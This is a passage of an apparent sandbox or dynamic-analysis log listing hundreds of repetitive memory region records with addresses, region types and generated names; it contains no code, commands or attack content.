0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7544 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7545 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7546 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7547 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7548 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7549 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7550 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7551 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7552 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7553 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7554 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7555 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7556 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7557 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7558 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7559 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7560 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7561 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7562 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7563 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7564 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7565 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7566 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7567 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7568 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7569 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7570 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7571 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7572 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7573 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7574 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7575 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7576 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7577 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7578 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7579 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7580 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7581 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7582 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7583 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7584 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7585 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7586 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7587 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7588 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7589 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7590 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7591 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7592 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7593 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7594 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7595 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7596 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7597 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7598 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7599 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7600 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7601 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7602 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7603 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7604 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7605 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7606 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7607 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7608 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7609 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7610 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7611 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7612 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7613 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7614 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7615 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7616 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7617 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7618 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7619 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7620 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7621 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7622 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7623 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7624 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7625 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7626 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7627 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7628 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7629 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7630 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7631 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7632 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7633 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7634 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7635 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7636 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7637 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7638 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7639 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7640 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7641 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7642 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7643 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7644 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7645 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7646 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7647 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7648 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7649 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7650 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7651 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7652 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7653 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7654 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7655 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7656 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7657 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7658 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7659 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7660 start_va = 0x102d0000 end_va = 0x107c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000102d0000" filename = "" Region: id = 7661 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7662 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7663 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7664 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7665 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7666 start_va = 0x400000 end_va = 0x402fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7667 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 7668 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7669 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7670 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7671 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 7672 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7673 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7674 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7675 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7676 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 7677 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 7678 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7679 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7680 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7681 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 7682 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7683 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7684 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7685 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 7686 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7687 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7688 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7689 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 7690 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7691 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7692 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7693 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 7694 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7695 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7696 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7697 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7698 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 7699 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 7700 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7701 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7702 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7703 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7704 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 7705 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7706 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7707 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7708 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 7709 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7710 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7711 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7712 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 7713 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7714 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7715 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7716 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7717 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7718 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7719 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7720 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7721 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7722 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7723 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7724 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7725 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7726 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7727 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7728 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7729 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7730 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7731 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7732 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7733 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7734 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7735 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7736 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7737 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7738 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7739 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7740 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7741 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = 